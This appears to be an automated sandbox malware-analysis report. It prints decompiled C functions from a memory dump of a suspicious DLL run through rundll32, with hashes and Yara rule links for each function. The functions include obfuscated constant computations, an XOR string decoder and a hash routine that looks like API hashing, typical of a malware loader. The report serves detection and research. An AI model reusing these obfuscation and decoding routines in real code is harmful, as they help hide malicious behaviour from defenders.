                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: &#
                                                                                                                                                            • API String ID: 0-2240308938
                                                                                                                                                            • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                                            • Instruction ID: 2b003b3a805c900498af494a5cf00a0ddc1f2bc26e97156be66589210a8d9945
                                                                                                                                                            • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                                            • Instruction Fuzzy Hash: BA3159726083518FC305DF28C88581BFBE0FF98718F554B6DE88AA7211D774EA09CB96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038DCF7 Relevance: 1.3, Strings: 1, Instructions: 90COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E0038DCF7(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t39;
				signed int _t43;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t70;
				unsigned int _t71;
				unsigned int _t72;
				signed int _t76;
				signed int* _t77;
				signed int* _t78;
				unsigned int _t80;
				void* _t86;
				short _t88;
				void* _t90;
				void* _t91;

				_push( *(_t90 + 0x28));
				_push( *(_t90 + 0x28));
				_push(__edx);
				E003820B9(_t39);
				 *(_t90 + 0x24) = 0xf19f37;
				_t77 =  &(__edx[1]);
				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
				 *(_t90 + 0x20) = 0xb1a340;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
				 *(_t90 + 0x1c) = 0x9743e1;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
				_t63 =  *__edx;
				_t78 =  &(_t77[1]);
				_t43 =  *_t77 ^ _t63;
				 *(_t90 + 0x28) = _t63;
				 *(_t90 + 0x2c) = _t43;
				_t21 = _t43 + 1; // 0xf19f38
				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
				_t91 = _t90 + 8;
				_t60 = E00377FF2(_t80 + _t80);
				 *(_t91 + 0x1c) = _t60;
				if(_t60 != 0) {
					_t88 = 0;
					_t76 = _t60;
					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
					if(_t86 != 0) {
						_t61 =  *(_t91 + 0x1c);
						do {
							_t70 =  *_t78;
							_t78 =  &(_t78[1]);
							_t71 = _t70 ^ _t61;
							 *_t76 = _t71 & 0x000000ff;
							_t76 = _t76 + 8;
							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
							_t72 = _t71 >> 0x10;
							_t88 = _t88 + 1;
							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
						} while (_t88 < _t86);
						_t60 =  *(_t91 + 0x18);
					}
					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
				}
				return _t60;
			}



















                                                                                                                                                            0x0038dcfd
                                                                                                                                                            0x0038dd01
                                                                                                                                                            0x0038dd05
                                                                                                                                                            0x0038dd07
                                                                                                                                                            0x0038dd0c
                                                                                                                                                            0x0038dd14
                                                                                                                                                            0x0038dd1c
                                                                                                                                                            0x0038dd20
                                                                                                                                                            0x0038dd28
                                                                                                                                                            0x0038dd30
                                                                                                                                                            0x0038dd38
                                                                                                                                                            0x0038dd40
                                                                                                                                                            0x0038dd48
                                                                                                                                                            0x0038dd50
                                                                                                                                                            0x0038dd58
                                                                                                                                                            0x0038dd5c
                                                                                                                                                            0x0038dd5f
                                                                                                                                                            0x0038dd61
                                                                                                                                                            0x0038dd65
                                                                                                                                                            0x0038dd69
                                                                                                                                                            0x0038dd79
                                                                                                                                                            0x0038dd84
                                                                                                                                                            0x0038dd93
                                                                                                                                                            0x0038dd95
                                                                                                                                                            0x0038dd9d
                                                                                                                                                            0x0038dda5
                                                                                                                                                            0x0038dda7
                                                                                                                                                            0x0038ddb8
                                                                                                                                                            0x0038ddbd
                                                                                                                                                            0x0038ddbf
                                                                                                                                                            0x0038ddc3
                                                                                                                                                            0x0038ddc3
                                                                                                                                                            0x0038ddc5
                                                                                                                                                            0x0038ddc8
                                                                                                                                                            0x0038ddcd
                                                                                                                                                            0x0038ddd5
                                                                                                                                                            0x0038dddb
                                                                                                                                                            0x0038dddf
                                                                                                                                                            0x0038dde8
                                                                                                                                                            0x0038dde9
                                                                                                                                                            0x0038ddf0
                                                                                                                                                            0x0038ddf4
                                                                                                                                                            0x0038ddf8
                                                                                                                                                            0x0038ddf8
                                                                                                                                                            0x0038de03
                                                                                                                                                            0x0038de03
                                                                                                                                                            0x0038de0f

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: g|E
                                                                                                                                                            • API String ID: 0-3824901942
                                                                                                                                                            • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                                            • Instruction ID: 17a9803255702da8a20ef56e8f71f2cb2f0e1714b675fd76758ebbd831ceccae
                                                                                                                                                            • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                                            • Instruction Fuzzy Hash: 6A319E766083118FC314DF29C48146BF7E0FF98318F424B6EE889AB251D774EA09CB96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003751BB Relevance: 1.3, Strings: 1, Instructions: 81COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E003751BB() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_v28 = _v28 & 0x00000000;
				_v32 = 0x54cf7d;
				_v16 = 0x3835ff;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 * 0x17;
				_v16 = _v16 ^ 0x00095bb8;
				_t72 = 0xe98fb1d;
				_v24 = 0x583681;
				_t87 = 0x44;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000eb9f7;
				_v12 = 0x832b1f;
				_v12 = _v12 << 5;
				_v12 = _v12 | 0x242a8544;
				_v12 = _v12 ^ 0x346a2866;
				_v8 = 0x6a77bb;
				_v8 = _v8 >> 0xe;
				_t88 = 0x19;
				_v8 = _v8 / _t88;
				_v8 = _v8 ^ 0x9d9369f0;
				_v8 = _v8 ^ 0x9d908f3a;
				_v20 = 0x4802c8;
				_t89 = 0x21;
				_v20 = _v20 / _t89;
				_v20 = _v20 + 0xffffbfc3;
				_v20 = _v20 ^ 0x000df493;
				do {
					while(_t72 != 0x9835b86) {
						if(_t72 == 0xe98fb1d) {
							_push(_t72);
							_push(_t72);
							 *0x393e04 = E00377FF2(0x134);
							_t72 = 0x9835b86;
							continue;
						}
						goto L5;
					}
					_t83 =  *0x393e04; // 0x0
					E00380001(_v8, _t83 + 0x18, _v20);
					_t72 = 0x7dce4e4;
					L5:
				} while (_t72 != 0x7dce4e4);
				return 1;
			}















                                                                                                                                                            0x003751c1
                                                                                                                                                            0x003751c7
                                                                                                                                                            0x003751ce
                                                                                                                                                            0x003751d5
                                                                                                                                                            0x003751e2
                                                                                                                                                            0x003751ea
                                                                                                                                                            0x003751f1
                                                                                                                                                            0x003751f3
                                                                                                                                                            0x00375202
                                                                                                                                                            0x00375207
                                                                                                                                                            0x0037520c
                                                                                                                                                            0x00375213
                                                                                                                                                            0x0037521a
                                                                                                                                                            0x0037521e
                                                                                                                                                            0x00375225
                                                                                                                                                            0x0037522c
                                                                                                                                                            0x00375233
                                                                                                                                                            0x0037523a
                                                                                                                                                            0x0037523f
                                                                                                                                                            0x00375244
                                                                                                                                                            0x0037524b
                                                                                                                                                            0x00375252
                                                                                                                                                            0x0037525c
                                                                                                                                                            0x00375264
                                                                                                                                                            0x00375267
                                                                                                                                                            0x0037526e
                                                                                                                                                            0x00375275
                                                                                                                                                            0x00375275
                                                                                                                                                            0x0037527b
                                                                                                                                                            0x0037528b
                                                                                                                                                            0x0037528c
                                                                                                                                                            0x00375294
                                                                                                                                                            0x00375299
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00375299
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037527b
                                                                                                                                                            0x003752a0
                                                                                                                                                            0x003752ac
                                                                                                                                                            0x003752b2
                                                                                                                                                            0x003752b4
                                                                                                                                                            0x003752b4
                                                                                                                                                            0x003752c1

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: f(j4
                                                                                                                                                            • API String ID: 0-3086030595
                                                                                                                                                            • Opcode ID: 0ba396c741af541d3b10779e2cedc5816ae3f0cfa5819a9640fbe76a91118c7c
                                                                                                                                                            • Instruction ID: 1bac9771be97d1a632dd900d8e291a7db26eecac41c96bff2b86d72006fae737
                                                                                                                                                            • Opcode Fuzzy Hash: 0ba396c741af541d3b10779e2cedc5816ae3f0cfa5819a9640fbe76a91118c7c
                                                                                                                                                            • Instruction Fuzzy Hash: 17314771E01219EBCF19DFAAD9895EEBBB1FB44324F20849AE505AB250D3B45F45CF80
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00372051 Relevance: 1.3, Strings: 1, Instructions: 80COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E00372051(void* __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t71;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t92;
				signed int _t95;
				signed short* _t97;

				_push(_a8);
				_t97 = _a4;
				_push(_t97);
				E003820B9(_t71);
				_v16 = 0x71ca23;
				_v12 = 0x57f692;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0xd3252c;
				_v20 = _v20 + 0x4351;
				_v20 = _v20 + 0xffff5b79;
				_v20 = _v20 ^ 0x00d2c3f6;
				_a4 = 0xbb067e;
				_t83 = 0x11;
				_a4 = _a4 / _t83;
				_a4 = _a4 >> 8;
				_a4 = _a4 ^ 0xac5d3832;
				_a4 = _a4 ^ 0xac5d3334;
				_a4 = 0xab60c2;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x910d5570;
				_a4 = _a4 >> 4;
				_a4 = _a4 ^ 0x0f1cf547;
				if( *_t97 != 0) {
					do {
						_t80 = _v20;
						_a4 = 0xbb067e;
						_a4 = _a4 / _t83;
						_a4 = _a4 >> 8;
						_a4 = _a4 ^ 0xac5d3832;
						_a4 = _a4 ^ 0xac5d3334;
						_a4 = 0xab60c2;
						_a4 = _a4 << 0x10;
						_a4 = _a4 ^ 0x910d5570;
						_a4 = _a4 >> 4;
						_a4 = _a4 ^ 0x0f1cf547;
						_t92 = _v20 << _a4;
						_t78 =  *_t97 & 0x0000ffff;
						_t95 = _v20 << _a4;
						if(_t78 >= 0x41 && _t78 <= 0x5a) {
							_t78 = _t78 + 0x20;
						}
						_v20 = _t78;
						_t97 =  &(_t97[1]);
						_v20 = _v20 + _t92;
						_v20 = _v20 + _t95;
						_v20 = _v20 - _t80;
						_t83 = 0x11;
					} while ( *_t97 != 0);
				}
				return _v20;
			}















                                                                                                                                                            0x00372056
                                                                                                                                                            0x0037205a
                                                                                                                                                            0x0037205e
                                                                                                                                                            0x00372061
                                                                                                                                                            0x00372066
                                                                                                                                                            0x00372070
                                                                                                                                                            0x0037207b
                                                                                                                                                            0x00372081
                                                                                                                                                            0x00372085
                                                                                                                                                            0x0037208d
                                                                                                                                                            0x00372095
                                                                                                                                                            0x0037209d
                                                                                                                                                            0x003720a5
                                                                                                                                                            0x003720b3
                                                                                                                                                            0x003720b6
                                                                                                                                                            0x003720ba
                                                                                                                                                            0x003720bf
                                                                                                                                                            0x003720c7
                                                                                                                                                            0x003720cf
                                                                                                                                                            0x003720d7
                                                                                                                                                            0x003720dc
                                                                                                                                                            0x003720e4
                                                                                                                                                            0x003720e9
                                                                                                                                                            0x003720f4
                                                                                                                                                            0x003720fc
                                                                                                                                                            0x003720fc
                                                                                                                                                            0x00372102
                                                                                                                                                            0x00372110
                                                                                                                                                            0x00372114
                                                                                                                                                            0x00372119
                                                                                                                                                            0x00372121
                                                                                                                                                            0x00372131
                                                                                                                                                            0x00372139
                                                                                                                                                            0x0037213e
                                                                                                                                                            0x00372146
                                                                                                                                                            0x0037214b
                                                                                                                                                            0x00372153
                                                                                                                                                            0x0037215d
                                                                                                                                                            0x00372160
                                                                                                                                                            0x00372165
                                                                                                                                                            0x0037216c
                                                                                                                                                            0x0037216c
                                                                                                                                                            0x0037216f
                                                                                                                                                            0x00372173
                                                                                                                                                            0x00372176
                                                                                                                                                            0x0037217a
                                                                                                                                                            0x0037217e
                                                                                                                                                            0x00372184
                                                                                                                                                            0x00372185
                                                                                                                                                            0x0037218f
                                                                                                                                                            0x00372199

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: QC
                                                                                                                                                            • API String ID: 0-229404352
                                                                                                                                                            • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                                            • Instruction ID: 9e76d67506b99547ffb428636133dfe4309ee9f692f1604cafb5cdcfa2781a0c
                                                                                                                                                            • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                                            • Instruction Fuzzy Hash: 463115719083818BD315DF29C48905BBBE0FFC87A8F558E1DF4C9A6225D7B4C688CB56
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038176B Relevance: 1.3, Strings: 1, Instructions: 75COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E0038176B(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t102;
				signed int _t103;

				_v36 = _v36 & 0x00000000;
				_v40 = 0x355323;
				_v24 = 0x6eb9b5;
				_v24 = _v24 + 0x6c21;
				_t102 = __ecx;
				_t91 = 0x64;
				_v24 = _v24 / _t91;
				_v24 = _v24 ^ 0x0005c519;
				_v32 = 0xba69a0;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x5d3c95d0;
				_v20 = 0x99612d;
				_v20 = _v20 | 0x6bf7bfaf;
				_v20 = _v20 + 0x66ac;
				_v20 = _v20 ^ 0x6c036c89;
				_v16 = 0xd72900;
				_v16 = _v16 + 0xffff2462;
				_v16 = _v16 ^ 0xa7b97bfd;
				_v16 = _v16 + 0xffff7578;
				_v16 = _v16 ^ 0xa76084ba;
				_v12 = 0xeb6610;
				_t92 = 0x6f;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x2e835447;
				_v12 = _v12 ^ 0x21f4cf0c;
				_v28 = 0x644f8d;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x89f1a004;
				_v8 = 0xbb77ef;
				_t93 = 0x72;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 / _t93;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x18aaba50;
				_t87 = E00380AE0(_v8, _v28);
				_push(_v12);
				_t103 = _t87;
				_push(_t102);
				_push(_t103);
				_push(3);
				E003780E3(_v20, _v16);
				 *((short*)(_t102 + _t103 * 2)) = 0;
				return 0;
			}


















                                                                                                                                                            0x00381771
                                                                                                                                                            0x00381777
                                                                                                                                                            0x0038177e
                                                                                                                                                            0x00381785
                                                                                                                                                            0x00381793
                                                                                                                                                            0x00381795
                                                                                                                                                            0x0038179a
                                                                                                                                                            0x0038179f
                                                                                                                                                            0x003817a6
                                                                                                                                                            0x003817ad
                                                                                                                                                            0x003817b1
                                                                                                                                                            0x003817b8
                                                                                                                                                            0x003817bf
                                                                                                                                                            0x003817c6
                                                                                                                                                            0x003817cd
                                                                                                                                                            0x003817d4
                                                                                                                                                            0x003817db
                                                                                                                                                            0x003817e2
                                                                                                                                                            0x003817e9
                                                                                                                                                            0x003817f0
                                                                                                                                                            0x003817f7
                                                                                                                                                            0x00381801
                                                                                                                                                            0x00381806
                                                                                                                                                            0x0038180b
                                                                                                                                                            0x0038180f
                                                                                                                                                            0x00381816
                                                                                                                                                            0x0038181d
                                                                                                                                                            0x00381824
                                                                                                                                                            0x00381828
                                                                                                                                                            0x0038182c
                                                                                                                                                            0x00381833
                                                                                                                                                            0x0038183e
                                                                                                                                                            0x0038183f
                                                                                                                                                            0x00381847
                                                                                                                                                            0x0038184a
                                                                                                                                                            0x0038184e
                                                                                                                                                            0x00381861
                                                                                                                                                            0x00381866
                                                                                                                                                            0x0038186c
                                                                                                                                                            0x00381871
                                                                                                                                                            0x00381872
                                                                                                                                                            0x00381873
                                                                                                                                                            0x00381875
                                                                                                                                                            0x0038187f
                                                                                                                                                            0x00381888

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #S5
                                                                                                                                                            • API String ID: 0-40889119
                                                                                                                                                            • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                                            • Instruction ID: 7822d0a3924c875e3cf7acfce2ad2537c9d39cf0ca48097c3d4bed61ac4f6b8c
                                                                                                                                                            • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                                            • Instruction Fuzzy Hash: 883132B2D0020AEBCB48DFE5C94AAEEBBB1FB44704F20809AD515B6250D7B50B15CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003909B5 Relevance: 1.3, Strings: 1, Instructions: 71COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E003909B5(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t77;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v32 = 4;
				_v52 = 0xab6069;
				_v48 = 0xcf1f96;
				_v44 = 0x29044d;
				_v24 = 0xea6416;
				_v24 = _v24 | 0x7adbff7d;
				_v24 = _v24 ^ 0x5afbff7f;
				_v16 = 0x725236;
				_v16 = _v16 + 0xffff3c91;
				_v16 = _v16 << 7;
				_t88 = 0x2b;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x015653a2;
				_v12 = 0xbf3984;
				_v12 = _v12 ^ 0x457d3893;
				_t89 = 0x44;
				_v12 = _v12 / _t89;
				_v12 = _v12 + 0x25bc;
				_v12 = _v12 ^ 0x0106bc10;
				_v20 = 0xd655eb;
				_v20 = _v20 | 0x2344b0aa;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x147fb4df;
				_v8 = 0x70d8dc;
				_v8 = _v8 + 0xe534;
				_v8 = _v8 ^ 0xb5155b0d;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x01640b3f;
				_v28 = 0x2d9f47;
				_v28 = _v28 + 0xffffba71;
				_v28 = _v28 ^ 0x002c2593;
				_t77 = E003794EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
				asm("sbb eax, eax");
				return  ~_t77 & _v36;
			}


















                                                                                                                                                            0x003909bb
                                                                                                                                                            0x003909bf
                                                                                                                                                            0x003909c6
                                                                                                                                                            0x003909cd
                                                                                                                                                            0x003909d4
                                                                                                                                                            0x003909db
                                                                                                                                                            0x003909e2
                                                                                                                                                            0x003909e9
                                                                                                                                                            0x003909f0
                                                                                                                                                            0x003909f7
                                                                                                                                                            0x003909fe
                                                                                                                                                            0x00390a09
                                                                                                                                                            0x00390a12
                                                                                                                                                            0x00390a17
                                                                                                                                                            0x00390a1e
                                                                                                                                                            0x00390a25
                                                                                                                                                            0x00390a2f
                                                                                                                                                            0x00390a32
                                                                                                                                                            0x00390a35
                                                                                                                                                            0x00390a3c
                                                                                                                                                            0x00390a43
                                                                                                                                                            0x00390a4a
                                                                                                                                                            0x00390a55
                                                                                                                                                            0x00390a5b
                                                                                                                                                            0x00390a62
                                                                                                                                                            0x00390a69
                                                                                                                                                            0x00390a70
                                                                                                                                                            0x00390a77
                                                                                                                                                            0x00390a7b
                                                                                                                                                            0x00390a82
                                                                                                                                                            0x00390a89
                                                                                                                                                            0x00390a90
                                                                                                                                                            0x00390ab3
                                                                                                                                                            0x00390abd
                                                                                                                                                            0x00390ac7

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 6Rr
                                                                                                                                                            • API String ID: 0-3911282678
                                                                                                                                                            • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                                            • Instruction ID: 0300a002887d09cf3111665acece1b08533084ec42372056d62fc1b054c06c57
                                                                                                                                                            • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                                            • Instruction Fuzzy Hash: 2E31E1B1D1021EEBDB04CFA6C94A9EEFBB5FB44318F108699D121B6250D3B85B49CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00388519 Relevance: 1.3, Strings: 1, Instructions: 49COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E00388519(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t55;

				_push(_a4);
				_push(__ecx);
				E003820B9(_t55);
				_v8 = 0x519131;
				_v8 = _v8 ^ 0xec4619ea;
				_v8 = _v8 + 0x48c3;
				_v8 = _v8 ^ 0x9760daa2;
				_v8 = _v8 ^ 0x7b7f7884;
				_v16 = 0xb689a0;
				_v16 = _v16 + 0x133d;
				_v16 = _v16 ^ 0x00b72bb6;
				_v12 = 0xec38eb;
				_v12 = _v12 * 0x68;
				_v12 = _v12 | 0x70f3e2c1;
				_v12 = _v12 + 0xd290;
				_v12 = _v12 ^ 0x7ff36ca2;
				_v12 = 0x452aa4;
				_v12 = _v12 ^ 0xbb670255;
				_v12 = _v12 >> 1;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0x7280165f;
				_v24 = 0xb68a33;
				_v24 = _v24 + 0xffff2941;
				_v24 = _v24 ^ 0x00b92c3b;
				_v12 = 0x340add;
				_v12 = _v12 | 0xd5e1d7f7;
				_v12 = _v12 ^ 0xd5f6168b;
				_v20 = 0x853d17;
				_v20 = _v20 + 0xcd4d;
				_v20 = _v20 ^ 0x00837917;
				return E0037A30C(_v12, _a4, E00371DB9(__ecx), _v20);
			}









                                                                                                                                                            0x0038851f
                                                                                                                                                            0x00388523
                                                                                                                                                            0x00388524
                                                                                                                                                            0x00388529
                                                                                                                                                            0x00388530
                                                                                                                                                            0x00388537
                                                                                                                                                            0x0038853e
                                                                                                                                                            0x00388545
                                                                                                                                                            0x0038854c
                                                                                                                                                            0x00388553
                                                                                                                                                            0x0038855a
                                                                                                                                                            0x00388561
                                                                                                                                                            0x0038856c
                                                                                                                                                            0x0038856f
                                                                                                                                                            0x00388576
                                                                                                                                                            0x0038857d
                                                                                                                                                            0x00388584
                                                                                                                                                            0x0038858b
                                                                                                                                                            0x00388592
                                                                                                                                                            0x00388599
                                                                                                                                                            0x0038859c
                                                                                                                                                            0x003885a3
                                                                                                                                                            0x003885aa
                                                                                                                                                            0x003885b1
                                                                                                                                                            0x003885b8
                                                                                                                                                            0x003885bf
                                                                                                                                                            0x003885c6
                                                                                                                                                            0x003885cd
                                                                                                                                                            0x003885d4
                                                                                                                                                            0x003885db
                                                                                                                                                            0x00388605

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8
                                                                                                                                                            • API String ID: 0-719543824
                                                                                                                                                            • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                                            • Instruction ID: b3b1b9e09c524c092a0466d96d24ca058c86d0d56e8402b2a525d082676f5dfe
                                                                                                                                                            • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
